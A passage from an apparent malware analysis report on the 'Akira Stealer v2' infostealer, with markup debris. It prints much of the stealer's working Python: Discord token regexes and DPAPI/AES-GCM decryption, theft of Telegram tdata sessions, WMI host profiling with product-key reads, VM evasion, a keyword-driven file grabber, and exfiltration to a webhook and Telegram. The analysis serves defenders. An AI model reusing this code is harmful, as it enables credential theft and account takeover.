\".ldb\")):\n",[102,16363,16364],{"class":104,"line":329},[102,16365,16366],{},"        for line in open(f\"{path}{arg}/{file}\", errors=\"ignore\"):\n",[102,16368,16369],{"class":104,"line":346},[102,16370,16371],{},"            for regex in (r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}\", r\"mfa\\.[\\w-]{80,95}\"):\n",[102,16373,16374],{"class":104,"line":650},[102,16375,16376],{},"                tokens = re.findall(regex, line)\n",[102,16378,16379],{"class":104,"line":656},[102,16380,16381],{},"                for token in tokens:\n",[102,16383,16384],{"class":104,"line":662},[102,16385,16386],{},"                    self.tokens.append(token)\n",[102,16388,16389],{"class":104,"line":668},[102,16390,16391],{},"                    self.cehckToken(token)\n",[1254,16393,16394,16403,16411],{},[1257,16395,16396,16402],{},[251,16397,16398,16399],{},"Regex ",[63,16400,16401],{},"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}"," matches standard Discord tokens.",[1257,16404,16405,16410],{},[251,16406,16398,16407],{},[63,16408,16409],{},"mfa\\.[\\w-]{80,95}"," captures MFA tokens.",[1257,16412,16413,16414,16417],{},"Deduplication is implicit: tokens stored in ",[63,16415,16416],{},"self.tokens"," before validation.",[12,16419,16420],{},[251,16421,16422],{},"Encrypted Token Decryption in Discord Client",[12,16424,16425,16426,1884,16428,16430,16431,16434],{},"Discord’s client encrypts Local Storage entries under DPAPI, prefaced by ",[63,16427,14163],{},[63,16429,14166],{},". 
",[63,16432,16433],{},"get_discord(path, arg)"," handles this:",[56,16436,16438],{"className":12155,"code":16437,"language":12157,"meta":65,"style":65},"# Read Local State to obtain encrypted master key\nwith open(path + \"/Local State\", 'r') as f:\n    local_state = json.load(f)\nencrypted_key = b64decode(local_state['os_crypt']['encrypted_key'])[5:]\nmaster_key = self.CryptUnprotectData(encrypted_key)\n\n# Iterate LevelDB files for Base64 payloads\nfor file in os.listdir(path + arg):\n    if file.endswith((\".log\", \".ldb\")):\n        for line in open(f\"{path}{arg}/{file}\"):\n            for token_part in re.findall(r\"dQw4w9WgXcQ:([A-Za-z0-9+/=]+)\", line):\n                ciphertext = b64decode(token_part)\n                token = self.decrypt_value(ciphertext, master_key)\n                self.tokens.append(token)\n                self.cehckToken(token)\n",[63,16439,16440,16445,16450,16454,16459,16464,16468,16473,16477,16481,16486,16491,16496,16501,16506],{"__ignoreMap":65},[102,16441,16442],{"class":104,"line":105},[102,16443,16444],{},"# Read Local State to obtain encrypted master key\n",[102,16446,16447],{"class":104,"line":111},[102,16448,16449],{},"with open(path + \"/Local State\", 'r') as f:\n",[102,16451,16452],{"class":104,"line":329},[102,16453,14761],{},[102,16455,16456],{"class":104,"line":346},[102,16457,16458],{},"encrypted_key = b64decode(local_state['os_crypt']['encrypted_key'])[5:]\n",[102,16460,16461],{"class":104,"line":650},[102,16462,16463],{},"master_key = self.CryptUnprotectData(encrypted_key)\n",[102,16465,16466],{"class":104,"line":656},[102,16467,11519],{"emptyLinePlaceholder":2181},[102,16469,16470],{"class":104,"line":662},[102,16471,16472],{},"# Iterate LevelDB files for Base64 payloads\n",[102,16474,16475],{"class":104,"line":668},[102,16476,16356],{},[102,16478,16479],{"class":104,"line":674},[102,16480,16361],{},[102,16482,16483],{"class":104,"line":680},[102,16484,16485],{},"        for line in 
open(f\"{path}{arg}/{file}\"):\n",[102,16487,16488],{"class":104,"line":12692},[102,16489,16490],{},"            for token_part in re.findall(r\"dQw4w9WgXcQ:([A-Za-z0-9+/=]+)\", line):\n",[102,16492,16493],{"class":104,"line":12698},[102,16494,16495],{},"                ciphertext = b64decode(token_part)\n",[102,16497,16498],{"class":104,"line":12704},[102,16499,16500],{},"                token = self.decrypt_value(ciphertext, master_key)\n",[102,16502,16503],{"class":104,"line":12710},[102,16504,16505],{},"                self.tokens.append(token)\n",[102,16507,16508],{"class":104,"line":12716},[102,16509,16510],{},"                self.cehckToken(token)\n",[1254,16512,16513,16522],{},[1257,16514,16515,16518,16519,16521],{},[251,16516,16517],{},"Master Key Recovery",": Strips the 5-byte DPAPI header, then calls ",[63,16520,14827],{}," (wrapping Windows DPAPI) to decrypt the AES-GCM key.",[1257,16523,16524,16527,16528,16531,16532,16535,16536],{},[251,16525,16526],{},"Payload Parsing",": Tokens are prefixed with ",[63,16529,16530],{},"dQw4w9WgXcQ:"," (an attacker-chosen marker). 
After Base64 decoding, ",[63,16533,16534],{},"decrypt_value()"," splits IV and ciphertext:",[56,16537,16539],{"className":12155,"code":16538,"language":12157,"meta":65,"style":65},"def decrypt\\_value(buff, master\\_key):\niv = buff\\[3:15]\npayload = buff\\[15:]\ncipher = AES.new(master\\_key, AES.MODE\\_GCM, iv)\nreturn cipher.decrypt(payload)\\[:-16].decode()\n",[63,16540,16541,16546,16551,16556,16561],{"__ignoreMap":65},[102,16542,16543],{"class":104,"line":105},[102,16544,16545],{},"def decrypt\\_value(buff, master\\_key):\n",[102,16547,16548],{"class":104,"line":111},[102,16549,16550],{},"iv = buff\\[3:15]\n",[102,16552,16553],{"class":104,"line":329},[102,16554,16555],{},"payload = buff\\[15:]\n",[102,16557,16558],{"class":104,"line":346},[102,16559,16560],{},"cipher = AES.new(master\\_key, AES.MODE\\_GCM, iv)\n",[102,16562,16563],{"class":104,"line":650},[102,16564,16565],{},"return cipher.decrypt(payload)\\[:-16].decode()\n",[186,16567,16569],{"id":16568},"_793-token-validation-exfiltration","7.9.3 Token Validation & Exfiltration",[12,16571,192],{},[12,16573,16574],{},"Each extracted token is validated via live API call:",[56,16576,16579],{"className":16577,"code":16578,"language":61},[59],"headers = {\"Authorization\": token}\nresp = requests.get(\"https://discordapp.com/api/v9/users/@me\", headers=headers)\nif resp.status_code == 200:\n    self.cehckToken(token)\n",[63,16580,16578],{"__ignoreMap":65},[1254,16582,16583],{},[1257,16584,16585,805,16588,16591,16592,16595,16596],{},[251,16586,16587],{},"On success",[63,16589,16590],{},"cehckToken()"," determines whether to send via Telegram (",[63,16593,16594],{},"useTg=True",") or Discord webhook:",[56,16597,16599],{"className":12155,"code":16598,"language":12157,"meta":65,"style":65},"if useTg:\nself.sendTokenTg(token)\nelse:\nself.send\\_embed(token)\n",[63,16600,16601,16606,16611,16616],{"__ignoreMap":65},[102,16602,16603],{"class":104,"line":105},[102,16604,16605],{},"if 
useTg:\n",[102,16607,16608],{"class":104,"line":111},[102,16609,16610],{},"self.sendTokenTg(token)\n",[102,16612,16613],{"class":104,"line":329},[102,16614,16615],{},"else:\n",[102,16617,16618],{"class":104,"line":346},[102,16619,16620],{},"self.send\\_embed(token)\n",[1254,16622,16623],{},[1257,16624,16625,16630],{},[251,16626,16627],{},[63,16628,16629],{},"send_embed"," crafts a rich Discord embed containing user metadata (username, discriminator, email, Nitro status, billing info) using fields from",[56,16632,16635],{"className":16633,"code":16634,"language":61},[59],"user_json = requests.get(...).json()\nusername = user_json[\"username\"]\nid = user_json[\"id\"]\n# embed fields: token, email, phone, IP, flags, Nitro, billing\n",[63,16636,16634],{"__ignoreMap":65},[1254,16638,16639],{},[1257,16640,16641,16646],{},[251,16642,16643],{},[63,16644,16645],{},"sendTokenTg"," sends a plain-text summary over Telegram API.",[186,16648,16650],{"id":16649},"_794-telegram-session-harvesting","7.9.4 Telegram Session Harvesting",[12,16652,192],{},[12,16654,16655],{},"Beyond Discord tokens, the stealer grabs Telegram Desktop sessions:",[56,16657,16659],{"className":12155,"code":16658,"language":12157,"meta":65,"style":65},"@staticmethod\ndef steal_telegram():\n    src = f\"{os.getenv('APPDATA')}/Telegram Desktop/tdata\"\n    Utils.TaskKill(\"telegram.exe\")\n    shutil.copytree(src, os.path.join(Utils.get_temp_folder(), \"Telegram\"))\n",[63,16660,16661,16665,16670,16675,16680],{"__ignoreMap":65},[102,16662,16663],{"class":104,"line":105},[102,16664,12644],{},[102,16666,16667],{"class":104,"line":111},[102,16668,16669],{},"def steal_telegram():\n",[102,16671,16672],{"class":104,"line":329},[102,16673,16674],{},"    src = f\"{os.getenv('APPDATA')}/Telegram Desktop/tdata\"\n",[102,16676,16677],{"class":104,"line":346},[102,16678,16679],{},"    Utils.TaskKill(\"telegram.exe\")\n",[102,16681,16682],{"class":104,"line":650},[102,16683,16684],{},"    shutil.copytree(src, 
os.path.join(Utils.get_temp_folder(), \"Telegram\"))\n",[1254,16686,16687,16693,16702],{},[1257,16688,16689,16692],{},[251,16690,16691],{},"Process Termination",": Ensures file locks are released.",[1257,16694,16695,16698,16699,16701],{},[251,16696,16697],{},"Recursive Copy",": Steals ",[63,16700,15936],{}," folder, including user sessions, contacts, and cached messages.",[1257,16703,16704,16706,16707,16710],{},[251,16705,9034],{},": The stolen folder is zipped and uploaded via ",[63,16708,16709],{},"sendFilesTG()",", with the download link embedded in a Telegram message.",[12,16712,16713,16714,16716],{},"Akira Stealer’s ",[63,16715,9018],{}," module combines regex-based scraping, DPAPI-backed AES-GCM decryption, live API validation, and multi-protocol exfiltration (webhook + Telegram) to deliver a seamless account takeover capability across both Discord and Telegram platforms.",[41,16718,16720],{"id":16719},"_710-system-profiling","7.10 System Profiling",[12,16722,47],{},[12,16724,16725,16726,16729],{},"Akira Stealer v2 incorporates an extensive system profiling phase to gather host metadata, environment attributes, and network details. This information is collated in the ",[63,16727,16728],{},"Data"," class and later packaged with exfiltrated credentials. 
Below, we break down the profiling logic with direct code references.",[186,16731,16733,16734,16736],{"id":16732},"_7101-data-class-initialization","7.10.1 ",[63,16735,16728],{}," Class Initialization",[12,16738,192],{},[12,16740,16741,16742,16744],{},"On startup, an instance of ",[63,16743,16728],{}," is created:",[56,16746,16748],{"className":12155,"code":16747,"language":12157,"meta":65,"style":65},"class Data:\n    def __init__(self):\n        self.username = os.getlogin()\n        self.computerName = os.getenv(\"computername\") or \"Unable to get computer name\"\n        self.system_info = f\"Computer Name: {self.computerName}\\n...\"\n        ...\n        self.ip = requests.get(url=\"https://api.ipify.org\").text\n        ipdata = json.loads(requests.post(url=f\"http://ip-api.com/json/{self.ip}\").text)\n        self.country = ipdata.get(\"country\")\n        self.countryCode = ipdata.get(\"countryCode\", \"\").lower()\n",[63,16749,16750,16755,16760,16765,16770,16775,16780,16785,16790,16795],{"__ignoreMap":65},[102,16751,16752],{"class":104,"line":105},[102,16753,16754],{},"class Data:\n",[102,16756,16757],{"class":104,"line":111},[102,16758,16759],{},"    def __init__(self):\n",[102,16761,16762],{"class":104,"line":329},[102,16763,16764],{},"        self.username = os.getlogin()\n",[102,16766,16767],{"class":104,"line":346},[102,16768,16769],{},"        self.computerName = os.getenv(\"computername\") or \"Unable to get computer name\"\n",[102,16771,16772],{"class":104,"line":650},[102,16773,16774],{},"        self.system_info = f\"Computer Name: {self.computerName}\\n...\"\n",[102,16776,16777],{"class":104,"line":656},[102,16778,16779],{},"        ...\n",[102,16781,16782],{"class":104,"line":662},[102,16783,16784],{},"        self.ip = requests.get(url=\"https://api.ipify.org\").text\n",[102,16786,16787],{"class":104,"line":668},[102,16788,16789],{},"        ipdata = 
json.loads(requests.post(url=f\"http://ip-api.com/json/{self.ip}\").text)\n",[102,16791,16792],{"class":104,"line":674},[102,16793,16794],{},"        self.country = ipdata.get(\"country\")\n",[102,16796,16797],{"class":104,"line":680},[102,16798,16799],{},"        self.countryCode = ipdata.get(\"countryCode\", \"\").lower()\n",[1254,16801,16802,16815],{},[1257,16803,16804,16807,16808,2901,16811,16814],{},[251,16805,16806],{},"Username & Hostname:"," Retrieved via ",[63,16809,16810],{},"os.getlogin()",[63,16812,16813],{},"COMPUTERNAME"," environment variable.",[1257,16816,16817,16820,16821,16824,16825,16827],{},[251,16818,16819],{},"IP Address:"," Fetched with ",[63,16822,16823],{},"requests.get(\"https://api.ipify.org\")",", then geolocated via ",[63,16826,12990],{}," for country and ISO code.",[186,16829,16831],{"id":16830},"_7102-os-and-hardware-enumeration","7.10.2 OS and Hardware Enumeration",[12,16833,192],{},[12,16835,16836],{},"Using Windows Management Instrumentation (WMI) commands:",[56,16838,16840],{"className":12155,"code":16839,"language":12157,"meta":65,"style":65},"# Operating System\nself.computerOS = subprocess.run('wmic os get Caption', shell=True, capture_output=True).stdout\n# Total Physical Memory\nself.totalMemory = subprocess.run('wmic computersystem get totalphysicalmemory', ...)\n# BIOS UUID\nself.uuid = subprocess.run('wmic csproduct get uuid', ...)\n# CPU Identifier\nself.cpu = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:System...\\Processor_Identifier'\", ...)\n# GPU Name\nself.gpu = subprocess.run('wmic path win32_VideoController get name', ...)\n# Windows Product Key\nself.productKey = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\\\Microsoft\\\\Windows NT...SoftwareProtectionPlatform' -Name BackupProductKeyDefault\", ...)\n",[63,16841,16842,16847,16852,16857,16862,16867,16872,16877,16882,16887,16892,16897],{"__ignoreMap":65},[102,16843,16844],{"class":104,"line":105},[102,16845,16846],{},"# 
Operating System\n",[102,16848,16849],{"class":104,"line":111},[102,16850,16851],{},"self.computerOS = subprocess.run('wmic os get Caption', shell=True, capture_output=True).stdout\n",[102,16853,16854],{"class":104,"line":329},[102,16855,16856],{},"# Total Physical Memory\n",[102,16858,16859],{"class":104,"line":346},[102,16860,16861],{},"self.totalMemory = subprocess.run('wmic computersystem get totalphysicalmemory', ...)\n",[102,16863,16864],{"class":104,"line":650},[102,16865,16866],{},"# BIOS UUID\n",[102,16868,16869],{"class":104,"line":656},[102,16870,16871],{},"self.uuid = subprocess.run('wmic csproduct get uuid', ...)\n",[102,16873,16874],{"class":104,"line":662},[102,16875,16876],{},"# CPU Identifier\n",[102,16878,16879],{"class":104,"line":668},[102,16880,16881],{},"self.cpu = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:System...\\Processor_Identifier'\", ...)\n",[102,16883,16884],{"class":104,"line":674},[102,16885,16886],{},"# GPU Name\n",[102,16888,16889],{"class":104,"line":680},[102,16890,16891],{},"self.gpu = subprocess.run('wmic path win32_VideoController get name', ...)\n",[102,16893,16894],{"class":104,"line":12692},[102,16895,16896],{},"# Windows Product Key\n",[102,16898,16899],{"class":104,"line":12698},[102,16900,16901],{},"self.productKey = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\\\Microsoft\\\\Windows NT...SoftwareProtectionPlatform' -Name BackupProductKeyDefault\", ...)\n",[12,16903,16904,16905,16908],{},"Results are parsed to human-readable strings (",[63,16906,16907],{},"strip()",", index operations) and concatenated into:",[56,16910,16912],{"className":12155,"code":16911,"language":12157,"meta":65,"style":65},"self.system_info = (\n    f\"Computer Name: {self.computerName}\\n\"\n    f\"Total Memory: {self.totalMemory}\\n\"\n    f\"CPU: {self.cpu}\\n\"\n    f\"GPU: {self.gpu}\\n\"\n    f\"Product Key: 
{self.productKey}\"\n)\n",[63,16913,16914,16919,16924,16929,16934,16939,16944],{"__ignoreMap":65},[102,16915,16916],{"class":104,"line":105},[102,16917,16918],{},"self.system_info = (\n",[102,16920,16921],{"class":104,"line":111},[102,16922,16923],{},"    f\"Computer Name: {self.computerName}\\n\"\n",[102,16925,16926],{"class":104,"line":329},[102,16927,16928],{},"    f\"Total Memory: {self.totalMemory}\\n\"\n",[102,16930,16931],{"class":104,"line":346},[102,16932,16933],{},"    f\"CPU: {self.cpu}\\n\"\n",[102,16935,16936],{"class":104,"line":650},[102,16937,16938],{},"    f\"GPU: {self.gpu}\\n\"\n",[102,16940,16941],{"class":104,"line":656},[102,16942,16943],{},"    f\"Product Key: {self.productKey}\"\n",[102,16945,16946],{"class":104,"line":662},[102,16947,12911],{},[186,16949,16951],{"id":16950},"_7103-vm-detection-anti-sandbox-checks","7.10.3 VM Detection & Anti-Sandbox Checks",[12,16953,192],{},[12,16955,16956,16957,16959],{},"Before deep profiling, the malware invokes ",[63,16958,12328],{}," to detect virtualization or analysis environments:",[56,16961,16963],{"className":12155,"code":16962,"language":12157,"meta":65,"style":65},"if VmProtect.isVM(1):\n    sys.exit()\n",[63,16964,16965,16970],{"__ignoreMap":65},[102,16966,16967],{"class":104,"line":105},[102,16968,16969],{},"if VmProtect.isVM(1):\n",[102,16971,16972],{"class":104,"line":111},[102,16973,16974],{},"    sys.exit()\n",[12,16976,16977],{},"Key checks include:",[1254,16979,16980,16986,16992,16998],{},[1257,16981,16982,16985],{},[251,16983,16984],{},"Registry Keys & Driver Descriptors",": Queries virtualization-related registry entries.",[1257,16987,16988,16991],{},[251,16989,16990],{},"Blacklisted UUIDs & Computer Names",": Matches against known VM fingerprints.",[1257,16993,16994,16997],{},[251,16995,16996],{},"HTTP Simulation",": Attempts to connect to a nonexistent domain under HTTPS.",[1257,16999,17000,17003,17004,805,17007,805,17010,1013],{},[251,17001,17002],{},"Process Blacklist",": Spawns a 
background thread to kill tools like ",[63,17005,17006],{},"wireshark",[63,17008,17009],{},"ollydbg",[63,17011,17012],{},"ida64",[186,17014,17016],{"id":17015},"_7104-packaging-transmission","7.10.4 Packaging & Transmission",[12,17018,192],{},[12,17020,17021,17022,17025],{},"The collected ",[63,17023,17024],{},"system_info",", IP, and country flag are embedded in the webhook payload headers:",[56,17027,17029],{"className":12155,"code":17028,"language":12157,"meta":65,"style":65},"webhook_payload = {\n    \"embeds\": [{\n        \"title\": f\"💉 Infected {self.computerName}/{self.username} | {self.ip} {flag}\",\n        \"description\": description + \"\\n```⚙️ System Info\\n\" + self.system_info + \"```\",\n        \"fields\": [...]\n    }]\n}\nrequests.post(self.webhook_url, json=webhook_payload)\n",[63,17030,17031,17036,17041,17046,17051,17056,17061,17065],{"__ignoreMap":65},[102,17032,17033],{"class":104,"line":105},[102,17034,17035],{},"webhook_payload = {\n",[102,17037,17038],{"class":104,"line":111},[102,17039,17040],{},"    \"embeds\": [{\n",[102,17042,17043],{"class":104,"line":329},[102,17044,17045],{},"        \"title\": f\"💉 Infected {self.computerName}/{self.username} | {self.ip} {flag}\",\n",[102,17047,17048],{"class":104,"line":346},[102,17049,17050],{},"        \"description\": description + \"\\n```⚙️ System Info\\n\" + self.system_info + \"```\",\n",[102,17052,17053],{"class":104,"line":650},[102,17054,17055],{},"        \"fields\": [...]\n",[102,17057,17058],{"class":104,"line":656},[102,17059,17060],{},"    }]\n",[102,17062,17063],{"class":104,"line":662},[102,17064,10086],{},[102,17066,17067],{"class":104,"line":668},[102,17068,17069],{},"requests.post(self.webhook_url, json=webhook_payload)\n",[1254,17071,17072,17078],{},[1257,17073,17074,17077],{},[251,17075,17076],{},"Flag Emoji",": Derived from ISO country code.",[1257,17079,17080,17083],{},[251,17081,17082],{},"Fields",": Include counts of stolen passwords, cookies, etc., but the system info 
is in the embed description for immediate context.",[12,17085,17086,17089],{},[251,17087,17088],{},"Summary:","\nSystem profiling in Akira Stealer v2 gathers comprehensive host and network data via WMI commands, environment variables, and IP geolocation. Coupled with VM detection and tool-killing routines, this ensures the attacker has a full snapshot of the compromised environment, enhancing targeted follow-up actions and filtering out analysis sandboxes.",[41,17091,17093,17094,1288],{"id":17092},"_711-file-grabber-class-utilssteal_files","7.11 File Grabber (Class: ",[63,17095,17096],{},"Utils.steal_files",[12,17098,47],{},[12,17100,17101],{},"Beyond browser data and tokens, Akira also attempts to extract valuable user-generated content—such as documents, spreadsheets, private notes, and cryptographic key files. The File Grabber module is responsible for this task. It operates by scanning high-value directories for common file types and patterns, then silently adding them to the exfiltration bundle. What makes this module especially dangerous is its simplicity and focus: it doesn’t attempt to crawl the entire file system. Instead, it targets specific, high-probability locations where sensitive files are typically stored. These include the Desktop, Documents, Downloads, and OneDrive directories—each relative to the user's home path. This focused approach improves both speed and stealth, reducing the likelihood of detection during the scan. It also avoids alerting the user by not accessing system or protected directories. 
Once files of interest are located, they are copied into a temporary folder, optionally renamed or grouped, and later compressed into the final ZIP archive that’s uploaded in the exfiltration phase.",[186,17103,17105],{"id":17104},"_7111-target-directories-enumeration","7.11.1 Target Directories Enumeration",[12,17107,192],{},[12,17109,17110],{},"The stealer focuses on four high-yield folders:",[56,17112,17114],{"className":12155,"code":17113,"language":12157,"meta":65,"style":65},"searchFolders = [\n    \"Desktop\",\n    \"Documents\",\n    \"Downloads\",\n    \"OneDrive\"\n]\n",[63,17115,17116,17121,17126,17131,17136,17141],{"__ignoreMap":65},[102,17117,17118],{"class":104,"line":105},[102,17119,17120],{},"searchFolders = [\n",[102,17122,17123],{"class":104,"line":111},[102,17124,17125],{},"    \"Desktop\",\n",[102,17127,17128],{"class":104,"line":329},[102,17129,17130],{},"    \"Documents\",\n",[102,17132,17133],{"class":104,"line":346},[102,17134,17135],{},"    \"Downloads\",\n",[102,17137,17138],{"class":104,"line":650},[102,17139,17140],{},"    \"OneDrive\"\n",[102,17142,17143],{"class":104,"line":656},[102,17144,15585],{},[12,17146,17147],{},"Each folder is interpreted relative to the victim’s home directory:",[56,17149,17151],{"className":12155,"code":17150,"language":12157,"meta":65,"style":65},"for folder in searchFolders:\n    current_path = os.path.join(os.environ['USERPROFILE'], folder)\n    if os.path.exists(current_path):\n        # proceed to scan\n",[63,17152,17153,17158,17163,17168],{"__ignoreMap":65},[102,17154,17155],{"class":104,"line":105},[102,17156,17157],{},"for folder in searchFolders:\n",[102,17159,17160],{"class":104,"line":111},[102,17161,17162],{},"    current_path = os.path.join(os.environ['USERPROFILE'], folder)\n",[102,17164,17165],{"class":104,"line":329},[102,17166,17167],{},"    if os.path.exists(current_path):\n",[102,17169,17170],{"class":104,"line":346},[102,17171,17172],{},"        # proceed to 
scan\n",[186,17174,17176],{"id":17175},"_7112-keyword-extension-filtering","7.11.2 Keyword & Extension Filtering",[12,17178,192],{},[12,17180,17181],{},[251,17182,17183],{},"Keyword List",[12,17185,17186],{},"A predefined set of substrings guides file selection. Only filenames containing at least one keyword are considered:",[56,17188,17190],{"className":12155,"code":17189,"language":12157,"meta":65,"style":65},"keywordsFiles = [\n    \"passw\", \"seed\", \"mnemo\", \"phrase\", \"login\", \"wallet\",\n    \"crypto\", \"token\", \"backup\", \"secret\", \"account\"\n]\n",[63,17191,17192,17197,17202,17207],{"__ignoreMap":65},[102,17193,17194],{"class":104,"line":105},[102,17195,17196],{},"keywordsFiles = [\n",[102,17198,17199],{"class":104,"line":111},[102,17200,17201],{},"    \"passw\", \"seed\", \"mnemo\", \"phrase\", \"login\", \"wallet\",\n",[102,17203,17204],{"class":104,"line":329},[102,17205,17206],{},"    \"crypto\", \"token\", \"backup\", \"secret\", \"account\"\n",[102,17208,17209],{"class":104,"line":346},[102,17210,15585],{},[1254,17212,17213,17229],{},[1257,17214,17215,17218,17219,17222,17223,2901,17226,1013],{},[251,17216,17217],{},"Partial Matches",": Keywords like ",[63,17220,17221],{},"passw"," capture both ",[63,17224,17225],{},"passwords.txt",[63,17227,17228],{},"passw_backup.docx",[1257,17230,17231,17234],{},[251,17232,17233],{},"Broad Coverage",": Encompasses authentication, wallet, crypto, and token-related terms.",[186,17236,17238],{"id":17237},"_7113-allowed-file-types","7.11.3 Allowed File Types",[12,17240,192],{},[12,17242,17243],{},"To minimize noise, a whitelist of extensions is enforced:",[56,17245,17247],{"className":12155,"code":17246,"language":12157,"meta":65,"style":65},"allowed_extensions = [\n    \".txt\", \".doc\", \".docx\", \".pdf\", \".csv\", \".xls\", \".xlsx\",\n    \".jpg\", \".png\"\n]\n",[63,17248,17249,17254,17259,17264],{"__ignoreMap":65},[102,17250,17251],{"class":104,"line":105},[102,17252,17253],{},"allowed_extensions 
= [\n",[102,17255,17256],{"class":104,"line":111},[102,17257,17258],{},"    \".txt\", \".doc\", \".docx\", \".pdf\", \".csv\", \".xls\", \".xlsx\",\n",[102,17260,17261],{"class":104,"line":329},[102,17262,17263],{},"    \".jpg\", \".png\"\n",[102,17265,17266],{"class":104,"line":346},[102,17267,15585],{},[186,17269,17271],{"id":17270},"_7113-size-constraint","7.11.3 Size Constraint",[12,17273,192],{},[12,17275,17276],{},"Files larger than 2 megabytes are skipped to optimize exfiltration speed and avoid large transfers:",[56,17278,17280],{"className":12155,"code":17279,"language":12157,"meta":65,"style":65},"file_size_mb = os.path.getsize(full_path) / (1024 * 1024)\nif file_size_mb \u003C= 2:\n    # eligible for copy\n",[63,17281,17282,17287,17292],{"__ignoreMap":65},[102,17283,17284],{"class":104,"line":105},[102,17285,17286],{},"file_size_mb = os.path.getsize(full_path) / (1024 * 1024)\n",[102,17288,17289],{"class":104,"line":111},[102,17290,17291],{},"if file_size_mb \u003C= 2:\n",[102,17293,17294],{"class":104,"line":329},[102,17295,17296],{},"    # eligible for copy\n",[186,17298,17300],{"id":17299},"_7114-recursive-scanning-copy-logic","7.11.4 Recursive Scanning & Copy Logic",[12,17302,192],{},[12,17304,17305],{},"Once the high-value directories have been identified, Akira initiates a recursive scanning routine to traverse subfolders and locate files matching specific keywords and extensions. This phase is built for precision and stealth: only files that match pre-defined criteria—such as filenames containing sensitive keywords and approved filetypes—are considered. The logic ensures that only relevant, user-generated content is exfiltrated. It ignores system files, caches, and binaries, and limits the size of any single file to 2 MB to reduce upload size and detection risk. This scanning method is silent, efficient, and optimized for stealthy data theft in real-world environments. 
By copying matching files into a staging folder and maintaining a list of what was taken, Akira prepares the content for bundling and exfiltration—while minimizing duplication and operational noise.",[12,17307,17308,17309,17312],{},"The core routine ",[63,17310,17311],{},"steal_files()"," operates as follows:",[56,17314,17316],{"className":12155,"code":17315,"language":12157,"meta":65,"style":65},"@staticmethod\ndef steal_files():\n    stolen_files = set()\n    temp_folder = Utils.get_temp_folder()\n\n    for folder in searchFolders:\n        current_path = os.path.join(os.environ['USERPROFILE'], folder)\n        if os.path.exists(current_path):\n            for root, _, files in os.walk(current_path):\n                for file in files:\n                    lower = file.lower()\n                    # Keyword check\n                    if any(keyword in lower for keyword in keywordsFiles):\n                        ext = os.path.splitext(lower)[1]\n                        # Extension and size check\n                        if ext in allowed_extensions and os.path.getsize(os.path.join(root, file)) \u003C= 2 * 1024 * 1024:\n                            # Prepare destination\n                            files_dir = os.path.join(temp_folder, \"Files\")\n                            os.makedirs(files_dir, exist_ok=True)\n                            shutil.copy(os.path.join(root, file), os.path.join(files_dir, file))\n                            stolen_files.add(file)\n    data.stolen_files.extend(stolen_files)\n",[63,17317,17318,17322,17327,17332,17337,17341,17346,17351,17356,17361,17366,17371,17376,17381,17386,17391,17396,17401,17406,17411,17416,17421],{"__ignoreMap":65},[102,17319,17320],{"class":104,"line":105},[102,17321,12644],{},[102,17323,17324],{"class":104,"line":111},[102,17325,17326],{},"def steal_files():\n",[102,17328,17329],{"class":104,"line":329},[102,17330,17331],{},"    stolen_files = 
set()\n",[102,17333,17334],{"class":104,"line":346},[102,17335,17336],{},"    temp_folder = Utils.get_temp_folder()\n",[102,17338,17339],{"class":104,"line":650},[102,17340,11519],{"emptyLinePlaceholder":2181},[102,17342,17343],{"class":104,"line":656},[102,17344,17345],{},"    for folder in searchFolders:\n",[102,17347,17348],{"class":104,"line":662},[102,17349,17350],{},"        current_path = os.path.join(os.environ['USERPROFILE'], folder)\n",[102,17352,17353],{"class":104,"line":668},[102,17354,17355],{},"        if os.path.exists(current_path):\n",[102,17357,17358],{"class":104,"line":674},[102,17359,17360],{},"            for root, _, files in os.walk(current_path):\n",[102,17362,17363],{"class":104,"line":680},[102,17364,17365],{},"                for file in files:\n",[102,17367,17368],{"class":104,"line":12692},[102,17369,17370],{},"                    lower = file.lower()\n",[102,17372,17373],{"class":104,"line":12698},[102,17374,17375],{},"                    # Keyword check\n",[102,17377,17378],{"class":104,"line":12704},[102,17379,17380],{},"                    if any(keyword in lower for keyword in keywordsFiles):\n",[102,17382,17383],{"class":104,"line":12710},[102,17384,17385],{},"                        ext = os.path.splitext(lower)[1]\n",[102,17387,17388],{"class":104,"line":12716},[102,17389,17390],{},"                        # Extension and size check\n",[102,17392,17393],{"class":104,"line":12722},[102,17394,17395],{},"                        if ext in allowed_extensions and os.path.getsize(os.path.join(root, file)) \u003C= 2 * 1024 * 1024:\n",[102,17397,17398],{"class":104,"line":12728},[102,17399,17400],{},"                            # Prepare destination\n",[102,17402,17403],{"class":104,"line":12734},[102,17404,17405],{},"                            files_dir = os.path.join(temp_folder, \"Files\")\n",[102,17407,17408],{"class":104,"line":12740},[102,17409,17410],{},"                            os.makedirs(files_dir, 
exist_ok=True)\n",[102,17412,17413],{"class":104,"line":12746},[102,17414,17415],{},"                            shutil.copy(os.path.join(root, file), os.path.join(files_dir, file))\n",[102,17417,17418],{"class":104,"line":12752},[102,17419,17420],{},"                            stolen_files.add(file)\n",[102,17422,17423],{"class":104,"line":12758},[102,17424,17425],{},"    data.stolen_files.extend(stolen_files)\n",[12,17427,17428],{},[251,17429,17430],{},"Key points:",[3259,17432,17433,17441,17450,17459,17465],{},[1257,17434,17435,17440],{},[251,17436,17437],{},[63,17438,17439],{},"os.walk",": Recursively descends into subdirectories.",[1257,17442,17443,17446,17447,1013],{},[251,17444,17445],{},"Case-insensitive matching",": Filenames are normalized via ",[63,17448,17449],{},"lower()",[1257,17451,17452,17455,17456,17458],{},[251,17453,17454],{},"Atomic copy",": Uses ",[63,17457,15451],{}," to preserve file content.",[1257,17460,17461,17464],{},[251,17462,17463],{},"Set of stolen filenames",": Prevents duplicate copies when the same file appears twice.",[1257,17466,17467,1061,17472,17475],{},[251,17468,17469,17470],{},"Integration with ",[63,17471,16728],{},[63,17473,17474],{},"data.stolen_files"," accumulates the stolen file list for later reporting.",[186,17477,17479],{"id":17478},"_7115-archiving-and-exfiltration","7.11.5 Archiving and Exfiltration",[12,17481,192],{},[12,17483,17484,17485,17487],{},"After collection, the ",[63,17486,15933],{}," folder is zipped and dispatched:",[56,17489,17491],{"className":12155,"code":17490,"language":12157,"meta":65,"style":65},"# Archive\nUtils.zip_client_file()  # creates CLIENT.zip from 